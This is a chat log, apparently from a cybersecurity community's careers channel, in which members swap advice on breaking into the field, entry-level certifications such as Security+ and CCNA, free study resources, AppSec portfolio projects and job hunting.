I was referring to the shady work, I don't tend to investigate things I don't need to, there is a small chance you can get caught up in trouble, and it might not be shady, just looks it.
i've only added up to 2021/22 but none related to IT
Anyone know anything about BYU's cybersecurity degree?
Why don't you just apply to Cyber jobs in India?
Any opinions on the best web certification that's affordable?
To help you with talking/general nervousness, talk in front of a mirror or see if there are any public speaking classes in your area. Even if it's just a couple classes, it helps. As far as getting a job in the US as a foreign national, I would probably avoid making a general statement of saying you're more skilled. I am assuming you didn't intend to write it like that, but it can definitely rub people the wrong way. As far as the cyber positions in the US, there are a lot, and they aren't just in the categories you mentioned. Also, cybersecurity requires a level of trust, so companies are going to be more hesitant to hire a foreign national. You'd also more than likely have to move to the US if you aren't here already. If you aren't, you'll have to look at the visa/sponsorship process.
BSCP from Burp Suite, CBBH and CWEE from HTB
was curious on if eWPT was regarded well on the trust scale
No
eWPTX, maybe but its still from INE
oof
Has anyone had an email interview before? I have one soon for a security analyst position
never heard of it
me neither it feels odd
Sounds a bit sus in my opinion
that sounds a bit strange especially if it is at a specific time. For my current job, I did have to fill out a pre-interview questionnaire, which isn't out of the norm
I agree
I was hoping that it'd be like "we're having an asynchronous interview" but that feels wishful
It could be like a pre interview
it's a "virtual screening test / interview"
Is it an actual interview or is it a screen? Some companies I've applied for didn't do a phone screen and instead just emailed me a list of questions. Which I then responded to.
Wouldn't it be easier for the company to put the questions on the original application form?
Unless they're not generic I guess

It was described as a "virtual screening test / interview." Hopefully it's the same as you've said
Just try applying bro, you never know what may come about. You have built a pretty solid portfolio already for an entry level cybersec role. I say go for it .!!!
Hey all question what are the best trainings to use to get prepared for security + cert as well as CySA cert and so on? I seem to be overwhelmed with seeing that IBM COMPTIA COURSERA and others offer training course? Which ones would be best?
Usually for CompTIA certs I suggest the official study guide or one of the equivalents and/or practice questions, as well as a free or cheap course like Professor Messer or one of the ones on Udemy. The Coursera course isn't sufficient for Sec+ but it, or the Google one, might still gain some recognition as a sign of interest from HR.
Seconding Professor Messer for Security+
I just looked and the videos are free? What the heck
Yes they are, something wrong?
No just wasn't expecting the learning material for security plus to be free somewhere
Everywhere I look I have to pay for it
Highly recommend Professor Messer, I also bought the official CompTIA Sec+ and study questions and it helped me years ago
Yes I'm applying
As far as getting a job in the US as a foreign national, I would probably avoid making a general statement of saying you're more skilled.
No sorry I didn't mean that way, I just meant if in the US there are 2 candidates one is US citizen and other foreign national, even if the foreign national is more skilled, the companies there would still prefer a US citizen. I didn't mean I'm more skilled than them, I'm still learning.
You'd also more than likely have to move to the US if you aren't here already. If you aren't, you'll have to look at the visa/sponsorship process.
I've a future thinking to it, I'm looking to get some experience here in India and then go for a Masters degree either in CS or Cybersec (unsure if Cybersec or CS bcoz Idk if Master's in Cybersec is worthy) in the US then after that if I get a Cyber related job there I can stay. But how likely is it this way?
Thanks for the motivation
Gave +1 Rep to @sour magnet (current: #2041 - 1)
There's a lot of reasons for that.
Hiring of a foreign national for a US company is almost always done through a local office or local recruiter, and that's only if the worker is expected to stay in the country of hire.
Actually moving a worker to the US is hugely expensive. Between the moving cost, the visa sponsorship, and all the legal bills it would easily outstrip the cost of hiring a US citizen.
If the non-citizen already has a work visa and permission to work in the US, it can be much simpler, but IIRC there are still time limits on how long a work visa is valid for.
Not moving, actually. Say I'm pursuing my Master's degree and after it gets completed, will I be able to get placement for a cybersec-related position in the US?
Or would they still prefer a citizen?
See above.
Hmm
heyy everyone
I wanted to learn ethical hacking and I have a MacBook, can anyone guide me?
I'm not from the USA, but from a totally general perspective the CCNA is on another level as far as I know
So CCNA can be a good choice for my certification?
Anyone know of any companies in the US hiring someone with little to no experience in cyber or IT? I'm trying to get my foot in the door while I finish up my bachelor's
Check LinkedIn
All the jobs I look at on LinkedIn usually require the BS or something crazy like 3-10 years of experience
Definitely
I can't seem to find entry level positions for people trying to start out
Cybersecurity isn't really an entry level environment, though there are ways to develop yourself and the skills you need to be what a company is looking for. If you haven't got basic computing and cybersecurity skills, it would be beneficial to start on THM and progress from there. Check out #start-here
It's extremely rare to hire someone as a SOC analyst without some experience and/or background in IT. Entry level to security usually means 2-5 years of education and experience
Thanks for these see never really knew that either @flat sedge @rugged delta
Gave +1 Rep to @flat sedge (current: #10 - 739)
how long do you have til you graduate?
If you can, see if you can find a job in your school's IT department, they often have jobs available for students
Yeah my school has it but fill out faster 
I have until end of this year
I go to school online so I'm out of state
check dice.com
Pretty good thanks
Gave +1 Rep to @past furnace (current: #2043 - 1)
Does anyone have experience with rotating shifts or on call rotations in a cybersecurity setting? What was that like? What things should I expect? What is it like in a fully remote setting? Does the workplace allow alternate changes to the schedule if you have certain responsibilities or difficulties (i.e. you have children or have to take care of a family member or you have a disability that makes certain times difficult; provided you are still able to do the same amount of work with a modified schedule)?
It's going to depend on the workplace and their policies. New employees will more than likely get the less desirable shifts, ie third shift.
If it's shift work, you're going to need to work your assigned shift.
Rotating schedules could also be a factor, again it's going to depend on the workplace and policies
Howdy fam. I'm looking to get into AppSec, and I'm looking to build out a portfolio full of projects that show off skills that would be applicable for that type of position. Does anyone around here have AppSec experience and/or advice on what types of projects to start with? For reference I have an SDET/QA Engineer background.
What part of AppSec are you looking to get in to?
I'd be grateful for any AppSec Engineer role where I work tangentially to app development teams and am responsible for the overall security/threat and vulnerability management of the products like how I saw in my previous company. I'd also be open to threat detection, or any other blue team oriented position. I had a lot of the responsibilities of the AppSec team at my previous position without actually having the title.
That sounds cool. I think a good project is implementing security in the CICD pipeline such as SAST, DAST, SCA, etc. and then moving on to things such as security monitoring when promoting applications to production
You can then conduct VAPT exercise on your applications to verify your security controls
I know that the job that I'm applying to uses an "all in one" tool (like Snyk), so it's hard to figure out what is doing what and how to show when things break on each type of scan when I'm just learning it, you know? I'll work on that tomorrow.
I found some open source apps to test, trying to figure out how to test the whole application because it's literally just scanning one file for some reason. If you're interested in troubleshooting it with me, you're more than welcome to hop on a call with me some time tomorrow!
Snyk has a lot of tools and unfortunately I have not touched any of them except their SAST offering hahaha
The SAST one is the free one, right?
but you can use free ones such as SonarQube's community edition
Hello, for the different jobs within the security industry, should career paths follow an order, like first security analyst, then security engineer, etc.? Or can I start my career as a penetration tester? Thanks
It's very rare but not unheard of to start your career as a penetration tester. You'd generally need to know and understand a lot about computers, systems engineering/administration, Windows/Linux, Active Directory, cloud platforms, perhaps some scripting/programming knowledge, web applications and spend a long time gaining knowledge and experience in such things. Also knowledge/skills in pentesting gained through platforms like Try Hack Me, participating in CTFs, maybe investigating bug bounties as a learning experience, having degrees/certs in relevant disciplines, etc.
Also, a lot of it can involve interacting with clients, addressing their concerns, being aware of potentially harmful effects of your actions, writing clear and concise reports for various levels of a business, giving presentations on tools/techniques and discussing experiences with your testing.
The field of penetration testing is a highly competitive one and you're going to need to be able to demonstrate a range of skills and knowledge. It's not just about knowing how to hack, but knowing how to provide a professional and valuable service to a client or employer.
You could consider reading the Tribe of Hackers books by Marcus J Carey for inspiration, particularly the Red Team one
I'll give that a look today, thank you!
Gave +1 Rep to @dense dagger (current: #22 - 361)
Thanks a lot for your answer. What I understand is that it's better to go step by step for someone like me.
Gave +1 Rep to @rugged delta (current: #21 - 364)
Thank you for the response, I really appreciate it.
Gave +1 Rep to @stoic cave (current: #20 - 384)
If you're looking to get started, have a look on #start-here and if you get stuck, you can ask questions in the relevant channels
Hey, I'm looking at pivoting my career into the cybersecurity space. I currently work as a Technology Engineer at a Fortune 100 company. I work in the email space and MS Exchange.
I don't have any certs in the security space. Would there be any that are recommended? Particularly in the US?
do you have any idea of what area you would like to go into?
Do you guys use custom CV templates or something?
I heard Europass CV is pretty popular
nice to see you as a MOD.
I want to go into a blue team role. I'm thinking into SOC at first to get the most exposure, then move from there
Security+ is a solid cert to start with, there is also the CySA+ once you have that, but also look at gaining some skills such as Splunk. The blue team paths on THM should help as well
Sweet, I do have SPLUNK knowledge. My team uses it to monitor email event logs but I'll start looking into the Security+ and CySA+. I'm almost through the SOC 1 on THM. But I need something I can put on a resume that will make me marketable...
Projects, and since you have splunk knowledge make sure to list that in your resume
Other than doing rooms in THM are there other projects I should be looking at? I have a kali and Ubuntu installed on my system
You could search around GitHub where people have labs and such, and YouTube, and follow how people set up things like a SIEM and more and ingest data into it
Hey all, making a transition in my career and want to jump into cyber. Not coming from zero experience in IT. I work at a fortune 500, as a technical associate. Basically software management, trainings, presentations, etc. While also performing on-site risk assessments of water systems. I work with a variety of our company's IT teams, and got super interested since we're working with APIs and creating different permission levels for users. Anyways, I have a BS in Biology, and MS in environmental tech. Curious of where I should start in my journey. Ideally would like to pivot in my own company but starting with 0 certs. Any recommendations?
@lusty osprey do you have a specific part of the field you want? I'd start playing around and taking in information for fundamentals and then comb through job postings online to see if something screams at you. It's a broad field and it helps having knowledge across it, but finding your unique passion will help you guide your career.
Thanks for the reply! Yeah, I was looking into cloud sec, or red / blue team. I like the idea of pen testing, running risk assessments, or consulting as I have public speaking skills. I was thinking starting as an analyst? Almost finished with the Google cert, recently, and THM. From friends/fam advice I heard of CompTIA?
Gave +1 Rep to @mystic kiln (current: #2044 - 1)
Certifications can provide proof of your knowledge and are often used as gatekeepers by companies on job applications. But while you can pass many certifications by memorizing information, it is important to understand what you are implementing and how it functions. A good start is working as an analyst and getting experience triaging systems. Through that you build experience and rapport. But this field will always require a hunger for knowledge; completing THM rooms can increase your knowledge while giving practical exercises. CompTIA certs are largely considered entry level, Sec+ specifically. But it's a good starting point and keeping certs valid shows a continued dedication to the field and improving yourself.
There are also other affordable trainings out there. But find your budget, test yourself via THM, look into the certs and find some that appeal to your interests. Do not overlook getting out into the community via meetups, conferences, and other local gatherings. That can find you good mentorship and broaden your network. Our community is strongly committed to helping each other grow.
If your company has a SOC, I'd see what you can do to maybe get some time seeing what they do. Build that relationship and ask them what they recommend for you to get your foot into that door. I'd be surprised if they turn you away. It's likely they will enjoy the interest and also be willing to put you forward if a position opens because they will know your work ethic and passion.
Thanks for the advice and reply! Understood, I want to make sure I am absorbing the information out there as there is seemingly a lot to know. I think I'm going to go for Sec+ first. But I'm trying to figure out what could be used as good practice projects to help absorb the information. I enjoy learning and have built my own PC as well. This week, through my company I was able to obtain a mentor in cybersecurity actually. I'm waiting to speak to her to see what she says, or advice she gives, but could be a good entry point! I have two major questions: 1. Is a degree needed? 2. I'm confused if I should pursue a Net+ cert or CCNA, or if research and trainings is enough. Thanks a lot man, really appreciate it
Gave +1 Rep to @mystic kiln (current: #1352 - 2)
Of course, I am happy to help and provide any insight I can. In response to your questions,
Is a degree needed? That is a subjective question. You do not truly need a degree to get into the field but a degree can supplement your experience. For instance a BS is often treated as 2-4 years and a masters as 4-6. I argue that having degrees may not show you are current in the field as they are one and done accomplishments but they do show your ability to handle tasks, timelines, and research.
- Net+ is a good broad network understanding entry cert. CCNA gets more tailored for Cisco and networking. In my experience.
Look up Paul Jerimy Security Certification Roadmap to get an idea about what levels certs are generally looked at as.
This is a choose your own adventure and you obviously have the passion to find your way. But do not ever feel like you will have to do this alone.
I've found my passion is mixed between threat hunting/intelligence and pentesting so I am working to increase my knowledge in those areas. While staying informed on the broader security practices. Being knowledgeable on both blue and red is a great benefit to the field.
Another good concept for CompTIA is look to see what certs renew other CompTIA certs and that can give you an idea of a route to pursue them.
I'm new to the field, declared as a cyber major. Other than doing TryHackMe, what else should I be studying and learning? I'm committed, just looking for guidance
@upbeat tartan there are plenty of free webinars, blogs, magazines to get your interest piqued. THM has great learning rooms to build the fundamentals and increase your challenges.